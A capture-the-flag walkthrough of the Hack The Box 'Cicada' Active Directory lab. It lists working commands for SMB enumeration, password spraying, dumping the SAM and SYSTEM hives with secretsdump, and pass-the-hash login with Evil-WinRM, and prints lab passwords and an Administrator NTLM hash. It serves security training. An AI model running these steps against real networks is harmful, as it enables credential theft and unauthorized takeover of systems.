Cicada HTB Walkthrough

Step 1: Initial Enumeration with Nmap

The first step in attacking Cicada HTB is performing an Nmap scan to identify open ports and running services.

sudo nmap -sV -sC -oA nmap/cicada

Nmap Results

The scan revealed several open ports, including:

  • LDAP (389, 636, 3268, 3269)
  • SMB (445)
  • Kerberos (88)
  • MSRPC (135, 593)
  • DNS (53)

This indicates an Active Directory (AD) environment, which suggests possible attacks related to SMB, Kerberos, and LDAP.

Step 2: Enumerating SMB Shares

Next, we check for accessible SMB shares:

smbclient -N -L //

Discovered Shares:

  • ADMIN$
  • C$
  • DEV
  • HR

Step 3: Downloading HR Notices

Attempting to access the HR share without authentication:

smbclient // -U ""
get "Notice from HR.txt"

Inspecting the file:

cat Notice\ from\ HR.txt

This provides a default password:

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

Step 4: Enumerate Users with SMB

Using NXC to enumerate all user RIDs:

nxc smb -u '.' -p "" --rid-brute

Step 5: Password Spraying with CME

Using CrackMapExec (CME) to spray the default password across users:

cme smb -u user.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'


We discover the user michael.wrightson with valid credentials.

Step 6: Extracting User Descriptions

Using CrackMapExec to check user descriptions:

crackmapexec smb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

This reveals another user’s password:

cicada.htb\david.orelious : Just in case I forget my password is aRt$Lp#7t*VQ!3

Step 7: Accessing the DEV Share

Using David’s credentials to explore the DEV share:

smbclient // -U 'david.orelious%aRt$Lp#7t*VQ!3'
smb: \> dir
smb: \> get backup_script.ps1

Step 8: Gaining a PowerShell Shell

The backup script reveals another password for Emily. Using Evil-WinRM to get a shell:

evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i

Inside the shell, navigate to the desktop and retrieve user.txt:

cd C:\Users\emily.oscars\Desktop
cat user.txt

Step 9: Extracting SYSTEM & SAM Files

To escalate privileges, dump the SAM & SYSTEM registry files:

reg save hklm\sam sam
reg save hklm\system system

Step 10: Dumping Admin Hash

Using impacket-secretsdump to retrieve NTLM hashes:

impacket-secretsdump -sam sam -system system local

The dump reveals the Administrator NTLM hash.

Step 11: Logging in as Administrator

Using Evil-WinRM with the extracted hash:

evil-winrm -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i

Once inside, retrieve root.txt:

cd C:\Users\Administrator\Desktop
cat root.txt


By leveraging SMB enumeration, password spraying, and privilege escalation, we successfully exploited the Cicada box and obtained both user and root flags. This demonstrates the importance of strong passwords, SMB hardening, and monitoring Active Directory environments for unauthorized access attempts.